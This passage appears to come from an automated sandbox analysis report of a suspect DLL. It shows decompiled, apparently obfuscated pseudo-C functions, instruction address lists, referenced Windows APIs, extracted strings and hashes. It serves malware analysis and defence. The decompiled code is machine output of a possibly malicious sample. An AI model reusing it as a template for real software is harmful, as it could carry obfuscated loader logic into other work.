					_t202 =  *(_t400 - 0x30);
				} else {
					 *0x6e2c59e0 = _t201;
					_t364 = _t364 + 2 + _t201 * 0x6d;
					 *0x6e2c5a90 = _t364;
					_t202 = _t364;
				}
				 *(_t400 - 0x14) = 0x6e2c5a0e;
				_t393 =  *(_t400 - 0x1c);
				_t297 = _t296 + _t202 + _t296 + _t391 + 0x3d;
				_push(0);
				asm("adc edx, eax");
				 *0x6e2c59d8 = _t297;
				 *0x6e2c59dc = _t346;
				do {
					if(_t393 != ( *0x6e2c59e2 & 0x0000ffff)) {
						_t94 = _t393 + 5; // -73177
						_t364 = _t94 + _t297;
						_push(0);
						 *0x6e2c5a90 = _t364;
						 *( *(_t400 - 0x14)) =  *( *(_t400 - 0x14)) + _t393;
						_t95 = _t393 + 0x3b; // -73123
						_t297 = _t297 + _t95 + _t364;
						asm("adc edx, eax");
						 *0x6e2c59d8 = _t297;
						 *0x6e2c59dc = _t346;
					}
					_t208 =  *(_t400 - 0x14) - 4;
					 *(_t400 - 0x14) = _t208;
				} while (_t208 > 0x6e2c59e2);
				_t394 =  *(_t400 - 0x18);
				_t209 = 0x6e2c59e6;
				 *(_t400 - 0x10) = _t297;
				_t298 =  *0x6e2c59e6 & 0x0000ffff;
				 *(_t400 - 0x14) = _t346;
				do {
					_t347 = _t364;
					if(_t347 == _t298) {
						goto L65;
					} else {
						_t364 = ( *_t209 & 0x0000ffff) * _t347;
						_t347 = _t364;
						 *0x6e2c5a90 = _t364;
						if(5 + _t347 * 2 != ( *0x6e2c59f0 & 0x0000ffff)) {
							_t209 =  *(_t400 - 0x2c);
							_t298 =  *0x6e2c59e6 & 0x0000ffff;
							goto L65;
						}
					}
					break;
					L65:
					_t209 = _t209 + 2;
					 *(_t400 - 0x2c) = _t209;
				} while (_t209 < 0x6e2c5a44);
				_t105 = _t394 + 2; // 0x2
				 *0x6e2c59d0 = _t105 + _t347;
				_t213 = E6E201029(_t394);
				_t300 =  *0x6e2c5a90; // 0x9dec7d1b
				_t106 = _t394 + 2; // 0x2
				_t369 = _t106 + _t300;
				 *0x6e2c5a00 = _t213;
				_t348 = _t300;
				if(_t300 >= _t369) {
					_t300 = _t369 * 0xffffffc3;
					 *0x6e2c59f2 =  *0x6e2c59f2 - _t300;
					_t348 = _t300;
				}
				_t107 = _t213 + 2; // 0x2
				_t371 = _t107 + _t348;
				 *0x6e2c59d0 = _t371;
				_t446 =  *0x6e2c5a04 - 0x1b47; // 0xac
				if(_t446 != 0) {
					_t349 =  *(_t400 - 0x10);
				} else {
					_t300 = ( *0x6e2c59e6 & 0x0000ffff) + _t348;
					_push(0);
					_t349 =  *(_t400 - 0x10) + 0x3b + _t300 * 2;
					asm("adc edi, eax");
					 *0x6e2c59d8 = _t349;
					 *0x6e2c59dc =  *(_t400 - 0x14);
					_t371 =  *0x6e2c59d0; // 0x96574ad2
				}
				_t395 = 0x6e2c5a0e;
				do {
					if(_t300 != ( *0x6e2c59e2 & 0x0000ffff)) {
						 *_t395 =  *_t395 + _t300;
						_t229 = _t300 + _t300;
						_t114 = _t229 + 5; // 0x5
						_t371 = _t114;
						_t115 = _t229 + 0x3b; // 0x3b
						_t300 = _t115 + _t371;
					}
					_t395 = _t395 - 4;
					_t216 = _t300;
				} while (_t395 > 0x6e2c59e2);
				_t396 =  *(_t400 - 0x18);
				_t301 = 6;
				 *0x6e2c59d0 = _t371;
				_t450 =  *0x6e2c5a02 - _t301; // 0x0
				if(_t450 != 0) {
					_t375 = _t371 + _t216 * 0xffffffc2;
					_t451 = _t375;
					 *0x6e2c59d0 = _t375;
				}
				_t117 = _t396 + 7; // 0x7
				 *0x6e2c5a90 = _t117 + _t349 * 2;
				E6E1FFB4A(_t396, _t451);
				_t350 =  *0x6e2c5a00; // 0x0
				_t303 = 0x6e2c5ac8;
				_t372 =  *0x6e2c59d8; // 0x69ab5d81
				do {
					_t452 = _t396 -  *0x6e2c5a18; // 0x4c
					if(_t452 != 0) {
						L80:
						_t120 = _t396 + 5; // 0x5
						 *0x6e2c59dc = 0;
						_t372 = _t120 + _t350;
						 *_t303 =  *_t303 + _t396;
						 *0x6e2c59d8 = _t372;
						asm("adc [ecx+0x4], eax");
						_t122 = _t396 + 0x3b; // 0x3b
						_t350 = _t122 + _t350 + _t372;
						 *0x6e2c5a00 = _t350;
					} else {
						_t453 = 0 -  *0x6e2c5a1c; // 0x0
						if(_t453 != 0) {
							goto L80;
						}
					}
					_t303 = _t303 - 0x10;
				} while (_t303 > 0x6e2c5a18);
				_t222 =  *0x6e2c59dc; // 0x0
				_t456 = 0 - _t222;
				if(_t456 >= 0 && (_t456 > 0 || _t350 >= _t372)) {
					_push(0);
					_t354 = _t350 - _t372 * 0x3d - _t396;
					 *0x6e2c5a58 =  *0x6e2c5a58 - _t396;
					asm("sbb [0x6e2c5a5c], eax");
					 *0x6e2c5a00 = _t354;
					asm("sbb ecx, [0x6e2c59dc]");
					_t372 = _t354 - _t372 + _t396;
					 *0x6e2c59d8 = _t372;
					asm("adc ecx, eax");
					 *0x6e2c59dc = 0;
				}
				_t305 =  *0x6e2c5a90; // 0x9dec7d1b
				_t306 =  *0x6e2c59d0; // 0x96574ad2
				 *0x6e2c59d0 = _t306 + 0x3d + _t372 + _t305 * 2;
				return E6E220075(1);
			}
































































































































                          0x6e201285
                          0x6e20128c
                          0x6e201291
                          0x6e201297
                          0x6e2012a2
                          0x6e2012aa
                          0x6e2012b2
                          0x6e2012b8
                          0x6e2012ba
                          0x6e2012c0
                          0x6e2012c3
                          0x6e2012c5
                          0x6e2012c8
                          0x6e2012cb
                          0x6e2012d6
                          0x6e2012da
                          0x6e2012e0
                          0x6e2012ec
                          0x6e2012f2
                          0x6e2012f9
                          0x6e2012ff
                          0x6e201302
                          0x6e201308
                          0x6e20130e
                          0x6e201310
                          0x6e201310
                          0x6e20131d
                          0x6e201320
                          0x6e201325
                          0x6e201328
                          0x6e20132b
                          0x6e20132e
                          0x00000000
                          0x6e201330
                          0x6e201334
                          0x6e201338
                          0x6e20133d
                          0x6e20133f
                          0x6e20134b
                          0x6e20134d
                          0x6e201353
                          0x6e201359
                          0x6e201361
                          0x6e201363
                          0x00000000
                          0x6e201363
                          0x6e201361
                          0x00000000
                          0x6e201366
                          0x6e201366
                          0x6e201369
                          0x6e20136c
                          0x6e201375
                          0x6e201378
                          0x6e20137e
                          0x6e201390
                          0x6e201397
                          0x6e201397
                          0x6e201399
                          0x6e20139f
                          0x6e2013a2
                          0x6e2013a4
                          0x6e201380
                          0x6e201380
                          0x6e201386
                          0x00000000
                          0x6e201388
                          0x6e201388
                          0x6e201388
                          0x6e201386
                          0x6e2013bf
                          0x6e2013c5
                          0x6e2013cb
                          0x6e2013d1
                          0x6e2013d9
                          0x6e2013e1
                          0x6e2013e6
                          0x6e2013eb
                          0x6e2013f2
                          0x6e2013f8
                          0x6e2013fb
                          0x6e201401
                          0x6e201403
                          0x00000000
                          0x6e201405
                          0x6e20140b
                          0x6e201414
                          0x6e201419
                          0x6e20141b
                          0x6e201421
                          0x6e201424
                          0x6e201426
                          0x6e201432
                          0x6e20143a
                          0x6e20143c
                          0x6e201442
                          0x00000000
                          0x6e201442
                          0x6e20143a
                          0x00000000
                          0x6e201449
                          0x6e201449
                          0x6e20144c
                          0x6e201463
                          0x6e201468
                          0x6e201473
                          0x6e20147a
                          0x6e201483
                          0x6e201489
                          0x6e20148b
                          0x6e201491
                          0x6e20149a
                          0x6e2014a3
                          0x6e2014a9
                          0x6e2014a9
                          0x6e2014b7
                          0x6e2014bc
                          0x6e2014bf
                          0x6e2014c4
                          0x6e2014c6
                          0x6e2014cb
                          0x6e2014d0
                          0x6e2014d2
                          0x6e2014d5
                          0x6e2014d8
                          0x6e2014df
                          0x6e2014e4
                          0x6e2014e7
                          0x6e2014ec
                          0x6e2014f2
                          0x6e2014f9
                          0x6e2014fa
                          0x6e201501
                          0x6e20151c
                          0x6e201526
                          0x6e201526
                          0x6e20152c
                          0x6e201503
                          0x6e20150a
                          0x6e201514
                          0x6e201514
                          0x6e201531
                          0x6e201536
                          0x6e20153b
                          0x6e201544
                          0x6e201545
                          0x6e201545
                          0x6e20154b
                          0x6e201551
                          0x6e201558
                          0x6e201578
                          0x6e20157e
                          0x6e201586
                          0x6e20158b
                          0x6e20158b
                          0x6e20158d
                          0x6e20155a
                          0x6e20155a
                          0x6e201565
                          0x6e201570
                          0x6e201570
                          0x6e201593
                          0x6e201594
                          0x6e201595
                          0x6e2015bc
                          0x6e2015c1
                          0x6e2015c7
                          0x6e2015cc
                          0x6e2015d2
                          0x6e2015d8
                          0x6e2015e1
                          0x6e2015e3
                          0x6e2015e6
                          0x6e2015e9
                          0x6e2015eb
                          0x6e2015f5
                          0x6e2015f7
                          0x6e2015fa
                          0x6e2015fa
                          0x6e2015fc
                          0x6e2015ff
                          0x6e201607
                          0x6e20160c
                          0x6e201612
                          0x6e201618
                          0x6e201620
                          0x6e201623
                          0x6e201629
                          0x6e201644
                          0x6e20164e
                          0x6e201654
                          0x6e20162b
                          0x6e20162b
                          0x6e201631
                          0x00000000
                          0x6e201633
                          0x6e201633
                          0x6e20163d
                          0x6e20163d
                          0x6e201631
                          0x6e201664
                          0x6e201667
                          0x6e20166a
                          0x6e20166f
                          0x6e201671
                          0x6e201674
                          0x6e20167b
                          0x6e20167e
                          0x6e201683
                          0x6e20168a
                          0x6e20168f
                          0x6e201695
                          0x6e20169c
                          0x6e20169d
                          0x6e2016a2
                          0x6e2016a5
                          0x6e2016aa
                          0x6e2016ac
                          0x6e2016b6
                          0x6e2016bb
                          0x6e2016bd
                          0x6e2016c0
                          0x6e2016c3
                          0x6e2016c8
                          0x6e2016cd
                          0x6e2016d4
                          0x6e2016d9
                          0x6e2016df
                          0x6e2016eb
                          0x6e2016f6
                          0x6e2016f9
                          0x6e201707
                          0x6e20170e
                          0x6e201715
                          0x6e20171a
                          0x6e201720
                          0x6e201725
                          0x6e20172e
                          0x6e201733
                          0x6e201737
                          0x6e20173e
                          0x6e201748
                          0x6e20174a
                          0x6e20174d
                          0x6e201753
                          0x6e201755
                          0x6e201758
                          0x6e20175d
                          0x6e201763
                          0x00000000
                          0x6e201765
                          0x6e201765
                          0x6e20176b
                          0x00000000
                          0x00000000
                          0x6e20176b
                          0x6e201740
                          0x6e201740
                          0x6e201746
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e201746
                          0x00000000
                          0x6e20176d
                          0x6e20176d
                          0x6e201770
                          0x6e20177a
                          0x6e20177f
                          0x6e201785
                          0x6e20178d
                          0x6e201790
                          0x6e201793
                          0x6e201799
                          0x6e2017a2
                          0x6e2017ad
                          0x6e2017b4
                          0x6e2017b7
                          0x6e2017c3
                          0x6e2017c6
                          0x6e2017cc
                          0x6e2017e9
                          0x6e2017f0
                          0x6e2017f0
                          0x6e2017f3
                          0x6e2017f6
                          0x6e2017f8
                          0x6e2017ce
                          0x6e2017d1
                          0x6e2017d9
                          0x6e2017e4
                          0x6e2017e4
                          0x6e2017fe
                          0x6e201801
                          0x6e201806
                          0x6e201809
                          0x6e20180c
                          0x6e20180f
                          0x6e201812
                          0x6e201878
                          0x00000000
                          0x6e201814
                          0x6e20181b
                          0x6e20181f
                          0x6e201824
                          0x6e201827
                          0x6e201830
                          0x6e201836
                          0x6e201838
                          0x6e201840
                          0x6e201842
                          0x00000000
                          0x6e201842
                          0x6e201840
                          0x00000000
                          0x6e201845
                          0x6e201845
                          0x6e201848
                          0x6e20184b
                          0x6e201854
                          0x6e201855
                          0x6e201858
                          0x6e20185b
                          0x6e201861
                          0x6e20187d
                          0x6e201884
                          0x6e201889
                          0x6e201889
                          0x6e20188c
                          0x6e20188e
                          0x6e201863
                          0x6e201865
                          0x6e20186b
                          0x00000000
                          0x6e20186d
                          0x6e20186d
                          0x6e201870
                          0x6e201870
                          0x6e201870
                          0x6e20186b
                          0x6e201891
                          0x6e201897
                          0x6e2018b1
                          0x6e201899
                          0x6e201899
                          0x6e2018a5
                          0x6e2018a7
                          0x6e2018ad
                          0x6e2018ad
                          0x6e2018b6
                          0x6e2018c2
                          0x6e2018c5
                          0x6e2018c7
                          0x6e2018ca
                          0x6e2018cc
                          0x6e2018d2
                          0x6e2018d8
                          0x6e2018e1
                          0x6e2018e6
                          0x6e2018e9
                          0x6e2018eb
                          0x6e2018ed
                          0x6e2018f3
                          0x6e2018f6
                          0x6e2018fb
                          0x6e2018fe
                          0x6e201900
                          0x6e201906
                          0x6e201906
                          0x6e20190f
                          0x6e201912
                          0x6e201915
                          0x6e20191c
                          0x6e20191f
                          0x6e201924
                          0x6e201927
                          0x6e20192e
                          0x6e201931
                          0x6e201931
                          0x6e201935
                          0x00000000
                          0x6e201937
                          0x6e201941
                          0x6e201944
                          0x6e201946
                          0x6e201955
                          0x6e201957
                          0x6e20195a
                          0x00000000
                          0x6e20195a
                          0x6e201955
                          0x00000000
                          0x6e201961
                          0x6e201961
                          0x6e201964
                          0x6e201967
                          0x6e20196e
                          0x6e201975
                          0x6e20197a
                          0x6e20197f
                          0x6e201985
                          0x6e201988
                          0x6e20198a
                          0x6e20198f
                          0x6e201993
                          0x6e201995
                          0x6e201998
                          0x6e20199f
                          0x6e20199f
                          0x6e2019a1
                          0x6e2019a9
                          0x6e2019ab
                          0x6e2019b1
                          0x6e2019b8
                          0x6e2019eb
                          0x6e2019ba
                          0x6e2019c4
                          0x6e2019c9
                          0x6e2019d2
                          0x6e2019d5
                          0x6e2019d7
                          0x6e2019dd
                          0x6e2019e3
                          0x6e2019e3
                          0x6e2019ee
                          0x6e2019f3
                          0x6e2019fc
                          0x6e2019fe
                          0x6e201a01
                          0x6e201a04
                          0x6e201a04
                          0x6e201a07
                          0x6e201a0a
                          0x6e201a0a
                          0x6e201a0c
                          0x6e201a0f
                          0x6e201a11
                          0x6e201a19
                          0x6e201a1e
                          0x6e201a1f
                          0x6e201a25
                          0x6e201a2c
                          0x6e201a31
                          0x6e201a31
                          0x6e201a33
                          0x6e201a33
                          0x6e201a39
                          0x6e201a41
                          0x6e201a46
                          0x6e201a4b
                          0x6e201a51
                          0x6e201a56
                          0x6e201a5c
                          0x6e201a5e
                          0x6e201a64
                          0x6e201a6e
                          0x6e201a6e
                          0x6e201a71
                          0x6e201a76
                          0x6e201a78
                          0x6e201a7a
                          0x6e201a80
                          0x6e201a86
                          0x6e201a89
                          0x6e201a8b
                          0x6e201a66
                          0x6e201a66
                          0x6e201a6c
                          0x00000000
                          0x00000000
                          0x6e201a6c
                          0x6e201a91
                          0x6e201a94
                          0x6e201a9c
                          0x6e201aa3
                          0x6e201aa5
                          0x6e201ab0
                          0x6e201ab4
                          0x6e201ab6
                          0x6e201abd
                          0x6e201ac5
                          0x6e201acf
                          0x6e201ad5
                          0x6e201ad7
                          0x6e201add
                          0x6e201adf
                          0x6e201adf
                          0x6e201ae5
                          0x6e201af0
                          0x6e201afc
                          0x6e201b07

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20128C
                          • GetSystemDirectoryA.KERNEL32 ref: 6E2013C5
                          • GetTempPathA.KERNEL32(0000056D,C:\Users\user\AppData\Local\Temp\,?,6E21FF71,?,00000001,?,?,00000001,?,6E2C27E0,0000000C,6E22006E,?,00000001,?), ref: 6E201468
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DirectoryH_prolog3PathSystemTemp
                          • String ID: (Z,n$6265$6623$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$DZ,n$DZ,n$DZ,n$DZ,n$EQ$Had s$Molecul$cd Island$cd Matter m$out drop $part $Y,n$Y,n$Y,n
                          • API String ID: 3607090873-1103469853
                          • Opcode ID: 1ec597e508b1389623b27b9f2332c2d0fe6531852423472695b85293070f7f77
                          • Instruction ID: 728cb7aee2a600c8191dd4e8088b25b04de57e2a826a6255d42a11b98fbc2278
                          • Opcode Fuzzy Hash: 1ec597e508b1389623b27b9f2332c2d0fe6531852423472695b85293070f7f77
                          • Instruction Fuzzy Hash: 0132C371A8161A8FCF84CFA9C49D5AD77F3BB89B14B24456BD405DB780E730E980CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E1FFB4A, Relevance: 14.6, APIs: 1, Strings: 8, Instructions: 1094sleepCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E1FFB4A(intOrPtr __ecx, void* __eflags) {
				signed int _v1;
				signed int _v2;
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed char _v64;
				intOrPtr _v68;
				signed int _t321;
				signed char _t324;
				signed short _t327;
				signed short _t344;
				void* _t346;
				signed short _t352;
				void* _t358;
				signed int _t360;
				signed short _t365;
				signed int _t367;
				signed char _t370;
				signed int _t377;
				signed int _t380;
				signed int _t383;
				signed int _t386;
				signed int _t387;
				void* _t398;
				signed char _t402;
				signed char _t403;
				signed int _t405;
				signed int _t406;
				signed char _t410;
				void* _t414;
				signed int _t415;
				void* _t419;
				signed int _t428;
				signed int _t431;
				signed char _t434;
				void* _t437;
				signed char _t440;
				signed int _t441;
				void* _t450;
				signed short _t456;
				signed int _t457;
				signed int _t461;
				void* _t462;
				signed int _t465;
				signed int _t470;
				signed int _t472;
				signed int _t477;
				signed char _t479;
				signed int _t486;
				signed int _t494;
				signed short _t500;
				void* _t502;
				signed int _t505;
				signed short _t508;
				signed int _t513;
				signed int _t516;
				void* _t519;
				void* _t522;
				signed char _t524;
				signed int _t528;
				signed char _t532;
				signed short _t535;
				signed int _t544;
				signed int _t547;
				signed short _t551;
				void* _t560;
				signed short _t567;
				intOrPtr _t569;
				signed char _t570;
				signed char _t583;
				signed int _t584;
				signed int _t593;
				signed char _t600;
				void* _t610;
				signed char _t611;
				signed int _t639;
				signed int _t648;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				signed int _t654;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t665;
				void* _t666;
				signed int _t669;
				signed int _t672;
				signed char _t674;
				signed char _t675;
				void* _t680;
				signed char _t681;
				signed char _t684;
				void* _t692;
				signed char _t694;
				signed char _t695;
				void* _t698;
				signed int _t713;
				signed int _t718;
				signed int _t720;
				signed short* _t722;
				signed int _t723;
				void* _t725;
				intOrPtr* _t726;
				signed int _t728;
				signed int _t729;
				signed char _t733;
				signed int _t736;
				void* _t737;
				signed int _t738;
				signed char _t740;
				signed char _t743;
				signed int _t748;
				signed int _t754;
				signed int _t757;
				signed int _t759;
				signed int _t761;
				signed int _t766;
				signed char _t772;
				signed int _t785;
				signed int _t793;
				signed short _t798;
				signed int _t808;
				signed int _t813;
				signed int _t817;
				signed char _t818;
				signed int _t819;
				signed int _t827;
				signed short* _t841;
				signed int _t842;
				signed int _t843;
				signed int _t845;
				signed short _t848;
				signed short _t849;
				signed char _t851;
				signed int _t852;
				signed char _t854;
				signed char _t855;
				signed int _t856;
				signed int _t858;
				signed char _t863;
				signed int _t866;
				signed int _t872;
				signed short _t877;
				signed int _t879;
				signed int _t881;
				signed int _t883;
				signed int _t884;
				signed int _t885;
				signed short _t886;
				signed int _t888;
				signed short _t892;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				void* _t903;
				signed short _t904;
				signed short _t905;
				signed int _t906;
				void* _t908;
				signed int _t910;
				signed int _t912;
				signed short _t915;
				signed int _t919;
				void* _t923;
				signed int _t930;
				void* _t948;
				void* _t964;
				void* _t968;

				_t321 =  *0x6e2c5a90; // 0x9dec7d1b
				 *0x6e2c59f2 =  *0x6e2c59f2 - _t321;
				_v60 = _t321;
				_v68 = __ecx;
				_t324 = E6E1FFA83();
				 *0x6e2dc8d0 = 0x6e2c86a0;
				_v64 = _t324;
				 *0x6e2c5a04 = _t324 - _v60 - 0x54;
				_t327 = E6E1FF7A5();
				_t713 =  *0x6e2c5a90; // 0x9dec7d1b
				_t898 =  *0x6e2c59e6 & 0x0000ffff;
				_t879 =  *0x6e2c5a00; // 0x0
				_t648 = _v60;
				_v8 = _t327 & 0x0000ffff;
				_v28 = 0x6e2c59e6;
				_t841 = 0x6e2c59e6;
				_v56 = _t713;
				do {
					if(_t879 == _t898) {
						goto L3;
					}
					_t9 = _t879 + 5; // 0x5
					_t648 = _t648 * ( *_t841 & 0x0000ffff);
					_t713 = _t9 + _t648;
					 *0x6e2c5a90 = _t713;
					if(_t713 == ( *0x6e2c59f0 & 0x0000ffff)) {
						break;
					}
					L3:
					_t841 =  &(_t841[1]);
				} while (_t841 < 0x6e2c5a44);
				_v56 = _t713;
				_t651 = _v64 - ( *0x6e2c5a04 & 0x000000ff) * 0x3d - _t713;
				 *0x6e2c59d0 = _t651;
				 *0x6e2c5a04 = _t651 - _t713 - 0x54;
				if(_t651 >= _t713) {
					_t877 = _v8;
					 *0x6e2c59f2 =  *0x6e2c59f2 - _t877;
					_t930 = _t877 & 0x0000ffff;
					_t651 = _t651 - _t713 * 0x3d - _t930;
					 *0x6e2c59d0 = _t651;
					 *0x6e2c5a90 = _t651 - _t713 + _t930;
				}
				E6E1FFA83();
				_t842 =  *0x6e2c59d0; // 0x96574ad2
				_t652 = _v56;
				 *0x6e2c5a04 = _t842 -  *0x6e2c5a04 + _t652;
				_v40 = _t842;
				if(( *0x6e2c59e6 & 0x0000ffff) + ( *0x6e2c59f2 & 0x0000ffff) != 0x32) {
					_t718 = _t879 *  *0x6e2c5a90 * 0x10e1d;
					_t652 = _t718 * 0x37;
					__eflags = _t652;
				} else {
					_t639 =  *0x6e2c5a90; // 0x9dec7d1b
					_t718 = _t879 - _t639 * _t639 * 0x10e1d + _t652;
				}
				 *0x6e2c5a90 = _t718;
				_t344 = E6E1FF7A5();
				_t899 =  *0x6e2c5a90; // 0x9dec7d1b
				_t720 = _v40;
				_v8 = _t344 & 0x0000ffff;
				_t843 = _v8 & 0x0000ffff;
				_t346 = 0xffffffac;
				_t653 = _t652 + _t346 - _t899;
				if(_t720 >= _t899) {
					 *0x6e2c59f2 =  *0x6e2c59f2 - _v8;
					_t720 = _t720 - _t899 * 0x3d - _t843;
					 *0x6e2c59d0 = _t720;
					 *0x6e2c5a90 = _t720 - _t899 + _t843;
				}
				_v40 = _t720;
				E6E1FF8B8(_t720, _t843);
				 *0x6e2c5a04 = _v40 - _t653 - 0x54;
				_t352 = E6E1FFA83();
				_t900 =  *0x6e2c59e6 & 0x0000ffff;
				_t722 = _v28;
				_t845 =  *0x6e2c5a90; // 0x9dec7d1b
				_v64 = _t352 & 0x0000ffff;
				do {
					if(_t879 == _t900) {
						goto L14;
					}
					_t23 = _t879 + 5; // 0x5
					_t653 = _t653 * ( *_t722 & 0x0000ffff);
					_t845 = _t23 + _t653;
					if(_t845 == ( *0x6e2c59f0 & 0x0000ffff)) {
						break;
					}
					L14:
					_t722 =  &(_t722[1]);
				} while (_t722 < 0x6e2c5a44);
				 *0x6e2c5a90 = _t845;
				_v36 = 0x2541188;
				_v52 = 0x2541188;
				_t901 = _v64 & 0x0000ffff;
				_t358 = 6;
				_t948 =  *0x6e2c5a02 - _t358; // 0x0
				if(_t948 == 0) {
					_t28 = _t901 + 0x11dde; // 0x9ded9af9
					_t360 = _t28 + _t845;
					__eflags = _t360;
					_v16 = _t360;
					_t723 = _t360;
				} else {
					_t723 =  *0x6e2c59d0; // 0x96574ad2
					_v16 = _t723;
					 *0x6e2c5a90 = _t845 +  ~_t901 - _t723 * 0x3d;
				}
				 *0x6e2c5a04 = _t723 - _t653 - 0x54;
				_t365 = E6E1FF7A5() & 0x0000ffff;
				_v20 = _t365;
				_v8 = _t365;
				_v44 = _t365 & 0x0000ffff;
				_t367 =  *0x6e2c5a90; // 0x9dec7d1b
				_v60 = 0xf;
				_v64 = 0xb4;
				_t36 = _t367 + 0x3b; // 0x9dec7d56
				_t725 = _t36 + _t653 * 2;
				_t654 =  *0x6e2c5a90; // 0x9dec7d1b
				_t370 = _v16 - _t725 - 0x54;
				_v12 = _t370;
				_t881 = (_t370 & 0x000000ff) * 0x36 + _t725;
				_v24 = _t881;
				 *0x6e2c5a00 = _t881;
				if(( *0x6e2c59f2 & 0x0000ffff) <= _t881) {
					 *0x6e2c59e0 = _t654;
					_t725 = _t654 * 0x36 + _t881;
				}
				_t41 = _t725 + 0x11dde; // 0x9ded9b34
				_v40 = 0xbc;
				_t903 = _t41 + _t654;
				_t726 = 0x6e2c5a0e;
				_v32 = _v32 & 0x00000000;
				do {
					if(_t881 != ( *0x6e2c59e2 & 0x0000ffff)) {
						 *_t726 =  *_t726 + _t881;
						_t45 = _t881 + 5; // 0x5
						_t654 = _t45 + _t903;
						_t46 = _t881 + 0x3b; // 0x3b
						_t903 = _t903 + _t46 + _t654;
					}
					_t726 = _t726 - 4;
				} while (_t726 > 0x6e2c59e2);
				_t47 = _t654 + 5; // 0xa
				_t904 =  *0x6e2c59f2; // 0x4a48
				_v48 = _t47 + _t903;
				if(_t904 <= _v8) {
					 *0x6e2c59e0 = _t654;
					_v12 = (_t654 & 0x000000ff) * 0x36 + _v8;
				}
				_t848 =  *0x6e2c59e6; // 0x5145
				_t377 = (_t904 & 0x0000ffff) + (_t848 & 0x0000ffff);
				_v56 = _t377;
				if(_t377 != 0x32) {
					_t728 = _t881 * _t654 * 0x10e1d;
					_t380 = _t728 * 0x37;
					__eflags = _t380;
				} else {
					_t380 = _v48;
					_t728 = _t881 - _t654 * _t654 * 0x10e1d + _t380;
				}
				_t658 =  ~_t728 - _t380 * 0x3c;
				_v48 = _t658;
				_t383 = _v44 & 0x0000ffff;
				if(_v56 != 0x32) {
					_t729 = _t383 * _t728 * 0x10e1d;
					_t386 = (_t729 & 0x000000ff) * 0x37;
					__eflags = _t386;
					_v12 = _t386;
				} else {
					_t881 = _v24;
					_t729 = (_v12 & 0x000000ff) - _t728 * _t728 * 0x10e1d + (_v44 & 0x0000ffff);
				}
				_t387 = _t848 & 0x0000ffff;
				_t849 =  *0x6e2c59f0; // 0x90
				_v48 = _t387;
				do {
					if(_t881 == _t387) {
						goto L36;
					}
					_t658 = _t658 * ( *_v28 & 0x0000ffff);
					_t63 = _t658 + 5; // 0x6e2c5a0f
					_t729 = _t63 + _t881;
					if(_t729 == (_t849 & 0x0000ffff)) {
						break;
					}
					_t387 = _v48;
					L36:
					_v28 = _v28 + 2;
				} while (_v28 < 0x6e2c5a44);
				_v48 = _t658;
				if(_v56 != 0x32) {
					_t659 = (_v44 & 0x0000ffff) * _t729 * 0x10e1d;
					__eflags = _t659;
				} else {
					_t659 = (_v12 & 0x000000ff) - _t729 * _t729 * 0x10e1d + (_v44 & 0x0000ffff);
				}
				_t851 = _v16;
				while(1) {
					_t852 = _v48;
					_v44 =  *0x6e2c59e6 & 0x0000ffff;
					_t733 = _t851 - _t852 - 0x54;
					_v32 = _v32 + 1;
					if((_t904 & 0x0000ffff) + _v44 != 0x32) {
						_t659 = (_v8 & 0x0000ffff) * _t659 * 0x10e1d;
						_t733 = (_t659 & 0x000000ff) * 0x37;
						__eflags = _t733;
					} else {
						_t659 = (_t733 & 0x000000ff) - _t659 * _t659 * 0x10e1d + (_v8 & 0x0000ffff);
					}
					 *0x6e2c5a90 = _t659;
					_t854 = 0x3b + _t852 * 2 + _t659;
					_t964 =  *0x6e2c5a04 - 0x1b47; // 0xac
					if(_t964 == 0) {
						_t854 = _t854 + _v44;
						_v16 = _v16 + _t854 * 2 + 0x3b;
					}
					_t905 =  *0x6e2c59f2; // 0x4a48
					if(_t854 > (_v8 & 0x0000ffff)) {
						_t854 = (_t854 - _t881 * 0x3d - _t659) * _t659 * 0x10e1d;
						_t827 = _t881;
						_v56 = ((_t733 & 0x000000ff) * (_t854 & 0x000000ff) & 0x000000ff) * 0x1d;
						if(_v8 == 0) {
							_t610 = 6;
							_t968 =  *0x6e2c5a02 - _t610; // 0x0
							_t611 = _v56;
							if(_t968 != 0) {
								_t881 = _t881 - ((_t611 & 0x000000ff) + _t854) * 0x3d - _t659 + 0xffffff86;
								_v24 = _t881;
								_t827 = _t881;
								 *0x6e2c5a00 = _t881;
							}
						}
						_t905 =  *0x6e2c59f2; // 0x4a48
						_t733 = _v56;
						_v16 = (_v8 & 0x0000ffff) * 0x36 + _t827;
					}
					_t398 = 0xffffffac;
					_t855 = _t854 + _t398 - _t659;
					_v48 = _t855;
					_t736 = _v16;
					_t402 = ((_t855 & 0x000000ff) * (_t733 & 0x000000ff) & 0x000000ff) * 0x1d;
					_v56 = _t402;
					if(_t736 >= _t855) {
						_v12 = _t736;
						__eflags =  *0x6e2c5a04 - 0x1b47; // 0xac
						_t856 = _t659;
						_t881 = _v24;
						_v16 = _t856;
						_v28 = _t402;
						if(__eflags == 0) {
							_t856 = _v44 + _t659;
							_v28 = _t402;
							_t659 = _t856;
							_v16 = _t856;
							 *0x6e2c5a90 = _t659;
